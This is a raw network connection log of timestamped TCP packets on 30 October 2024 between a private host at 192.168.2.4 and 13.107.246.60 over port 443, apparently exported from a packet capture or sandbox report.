                                                Oct 30, 2024 00:23:24.029512882 CET4435826613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.029591084 CET4435826613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.029647112 CET58266443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.029885054 CET58266443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.029896975 CET4435826613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.029910088 CET58266443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.029913902 CET4435826613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.033438921 CET58271443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.033480883 CET4435827113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.033577919 CET58271443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.033770084 CET58271443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.033787012 CET4435827113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.154489994 CET4435826713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.155525923 CET58267443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.155543089 CET4435826713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.156112909 CET58267443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.156116962 CET4435826713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.188246965 CET4435826813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.188965082 CET58268443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.188982964 CET4435826813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.189788103 CET58268443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.189793110 CET4435826813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.288067102 CET4435826713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.288101912 CET4435826713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.288152933 CET4435826713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.288388968 CET58267443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.288642883 CET58267443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.288652897 CET4435826713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.288670063 CET58267443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.288674116 CET4435826713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.293313026 CET58272443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.293355942 CET4435827213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.293447971 CET58272443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.293658018 CET58272443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.293673992 CET4435827213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.320138931 CET4435826813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.320190907 CET4435826813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.320343971 CET58268443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.320616007 CET58268443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.320625067 CET4435826813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.320636988 CET58268443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.320641994 CET4435826813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.324996948 CET58273443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.325097084 CET4435827313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.325205088 CET58273443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.325371027 CET58273443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.325403929 CET4435827313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.506792068 CET4435826913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.507999897 CET58269443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.508023024 CET4435826913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.508647919 CET58269443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.508656979 CET4435826913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.625679016 CET4435827013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.626290083 CET58270443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.626307964 CET4435827013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.626828909 CET58270443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.626833916 CET4435827013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.639084101 CET4435826913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.639219999 CET4435826913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.639386892 CET58269443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.639386892 CET58269443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.639430046 CET58269443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.639444113 CET4435826913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.642658949 CET58274443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.642725945 CET4435827413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.642826080 CET58274443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.643012047 CET58274443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.643059969 CET4435827413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.759794950 CET4435827013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.759814978 CET4435827013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.759849072 CET4435827013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.760010958 CET58270443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.760010958 CET58270443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.760237932 CET58270443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.760257006 CET4435827013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.760267973 CET58270443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.760273933 CET4435827013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.763717890 CET58275443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.763760090 CET4435827513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.763858080 CET58275443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.764070034 CET58275443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.764098883 CET4435827513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.771017075 CET4435827113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.771486044 CET58271443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.771523952 CET4435827113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.772080898 CET58271443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.772089958 CET4435827113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.902926922 CET4435827113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.903023958 CET4435827113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.903090954 CET58271443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.903320074 CET58271443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.903338909 CET4435827113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.903356075 CET58271443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.903362036 CET4435827113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.907907963 CET58276443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.907998085 CET4435827613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:24.908114910 CET58276443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.908325911 CET58276443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:24.908361912 CET4435827613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.025254011 CET4435827213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.026108027 CET58272443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.026135921 CET4435827213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.027587891 CET58272443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.027601004 CET4435827213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.059838057 CET4435827313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.060415983 CET58273443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.060458899 CET4435827313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.061701059 CET58273443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.061713934 CET4435827313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.176532030 CET4435827213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.177083015 CET4435827213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.177155972 CET58272443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.177201033 CET58272443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.177229881 CET4435827213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.177257061 CET58272443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.177273989 CET4435827213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.180425882 CET58277443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.180491924 CET4435827713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.180613995 CET58277443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.180711985 CET58277443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.180744886 CET4435827713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.193110943 CET4435827313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.193131924 CET4435827313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.193162918 CET4435827313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.193233013 CET58273443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.193275928 CET58273443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.193496943 CET58273443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.193522930 CET4435827313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.193551064 CET58273443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.193566084 CET4435827313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.196718931 CET58278443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.196794987 CET4435827813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.196909904 CET58278443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.197024107 CET58278443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.197072983 CET4435827813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.376738071 CET4435827413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.377486944 CET58274443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.377528906 CET4435827413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.377944946 CET58274443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.377958059 CET4435827413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.503202915 CET4435827513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.503914118 CET58275443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.503935099 CET4435827513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.504375935 CET58275443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.504380941 CET4435827513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.512362957 CET4435827413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.512437105 CET4435827413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.512496948 CET58274443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.512736082 CET58274443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.512753963 CET4435827413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.512767076 CET58274443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.512773037 CET4435827413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.515947104 CET58279443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.516000986 CET4435827913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.516108990 CET58279443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.516304016 CET58279443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.516333103 CET4435827913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.640885115 CET4435827513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.640913963 CET4435827513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.640955925 CET4435827513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.641001940 CET58275443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.641155958 CET58275443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.641345978 CET58275443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.641390085 CET4435827513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.641422033 CET58275443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.641437054 CET4435827513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.644783020 CET58280443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.644829035 CET4435828013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.644901991 CET58280443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.645087004 CET58280443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.645106077 CET4435828013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.673386097 CET4435827613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.673966885 CET58276443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.674015045 CET4435827613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.674349070 CET58276443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.674365997 CET4435827613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.812412977 CET4435827613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.812510967 CET4435827613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.812685966 CET58276443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.812777042 CET58276443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.812820911 CET4435827613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.812849998 CET58276443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.812866926 CET4435827613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.815505981 CET58281443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.815542936 CET4435828113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.815643072 CET58281443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.815835953 CET58281443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.815849066 CET4435828113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.903973103 CET4435827713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.904560089 CET58277443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.904612064 CET4435827713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.905013084 CET58277443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.905030012 CET4435827713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.946557045 CET4435827813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.947114944 CET58278443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.947154999 CET4435827813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:25.947504997 CET58278443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:25.947520018 CET4435827813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.036077023 CET4435827713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.036118031 CET4435827713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.036217928 CET58277443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.036513090 CET58277443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.036530972 CET4435827713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.036550045 CET58277443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.036556005 CET4435827713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.040194988 CET58282443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.040222883 CET4435828213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.040304899 CET58282443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.040509939 CET58282443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.040529966 CET4435828213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.081820011 CET4435827813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.081865072 CET4435827813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.081960917 CET58278443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.082148075 CET58278443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.082180977 CET4435827813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.082232952 CET58278443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.082247972 CET4435827813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.084724903 CET58283443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.084743023 CET4435828313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.084822893 CET58283443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.085030079 CET58283443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.085040092 CET4435828313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.270991087 CET4435827913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.271652937 CET58279443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.271673918 CET4435827913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.272149086 CET58279443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.272156000 CET4435827913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.405556917 CET4435827913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.405688047 CET4435827913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.405725956 CET4435827913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.405755043 CET58279443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.405819893 CET58279443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.406023979 CET58279443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.406034946 CET4435827913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.406050920 CET58279443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.406056881 CET4435827913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.406683922 CET4435828013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.407118082 CET58280443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.407138109 CET4435828013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.407531977 CET58280443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.407540083 CET4435828013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.409431934 CET58284443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.409457922 CET4435828413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.409544945 CET58284443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.409723997 CET58284443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.409733057 CET4435828413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.540220976 CET4435828013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.540266037 CET4435828013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.540321112 CET58280443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.540442944 CET58280443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.540457010 CET4435828013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.540468931 CET58280443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.540474892 CET4435828013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.543081999 CET58285443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.543118000 CET4435828513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.543206930 CET58285443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.543342113 CET58285443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.543359041 CET4435828513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.544550896 CET4435828113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.545106888 CET58281443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.545125961 CET4435828113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.545710087 CET58281443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.545713902 CET4435828113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.678066015 CET4435828113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.678097010 CET4435828113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.678136110 CET4435828113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.678268909 CET58281443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.678596973 CET58281443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.678607941 CET4435828113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.678617954 CET58281443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.678638935 CET4435828113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.682060003 CET58286443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.682086945 CET4435828613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.682162046 CET58286443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.682342052 CET58286443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.682353973 CET4435828613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.773104906 CET4435828213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.773641109 CET58282443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.773663998 CET4435828213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.774071932 CET58282443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.774077892 CET4435828213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.809019089 CET4435828313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.809449911 CET58283443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.809462070 CET4435828313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.809812069 CET58283443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.809817076 CET4435828313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.907007933 CET4435828213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.907119036 CET4435828213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.907186985 CET58282443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.909574032 CET58282443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.909594059 CET4435828213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.909606934 CET58282443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.909611940 CET4435828213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.913084984 CET58287443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.913105965 CET4435828713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.913202047 CET58287443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.913331985 CET58287443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.913345098 CET4435828713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.943208933 CET4435828313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.943236113 CET4435828313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.943295002 CET4435828313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.943409920 CET58283443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.943536997 CET58283443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.943799973 CET58283443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.943808079 CET4435828313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.943855047 CET58283443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.943860054 CET4435828313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.950398922 CET58288443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.950412989 CET4435828813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:26.950568914 CET58288443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.950761080 CET58288443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:26.950767040 CET4435828813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.145251036 CET4435828413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.145849943 CET58284443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.145860910 CET4435828413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.146521091 CET58284443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.146526098 CET4435828413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.285016060 CET4435828413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.285185099 CET4435828413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.285274982 CET58284443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.287177086 CET58284443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.287192106 CET4435828413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.287200928 CET58284443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.287206888 CET4435828413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.290764093 CET58289443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.290862083 CET4435828913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.290949106 CET58289443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.291167021 CET58289443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.291205883 CET4435828913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.317240953 CET4435828513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.318278074 CET58285443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.318300962 CET4435828513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.318604946 CET58285443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.318613052 CET4435828513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.419748068 CET4435828613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.420650005 CET58286443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.420659065 CET4435828613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.421956062 CET58286443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.421960115 CET4435828613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.458060980 CET4435828513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.458133936 CET4435828513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.458334923 CET58285443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.458976030 CET58285443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.458976030 CET58285443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.458997011 CET4435828513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.459007978 CET4435828513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.464870930 CET58290443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.464905977 CET4435829013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.465006113 CET58290443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.465198994 CET58290443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:27.465214014 CET4435829013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:27.553838968 CET4435828613.107.246.60192.168.2.4
